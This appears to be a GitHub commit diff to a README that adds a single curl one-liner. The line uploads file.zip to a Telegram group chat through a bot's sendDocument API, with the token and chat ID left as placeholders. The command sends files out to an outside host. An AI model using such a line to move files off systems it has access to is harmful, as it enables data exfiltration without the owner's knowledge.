Update README.md

This commit is contained in:
skyper
2023-06-22 22:48:41 +01:00
committed by GitHub
parent 6304871a7b
commit 570e245bc7
+1
View File
@@ -908,6 +908,7 @@ curl -s "https://api.telegram.org/bot<TG-BOT-TOKEN>/getUpdates" | jq -r '.result
```
```sh
# Upload file.zip straight into the group chat:
curl -sF document=@file.zip "https://api.telegram.org/bot<TG-BOT-TOKEN>/sendDocument?chat_id=<TG-CHAT-ID>"
```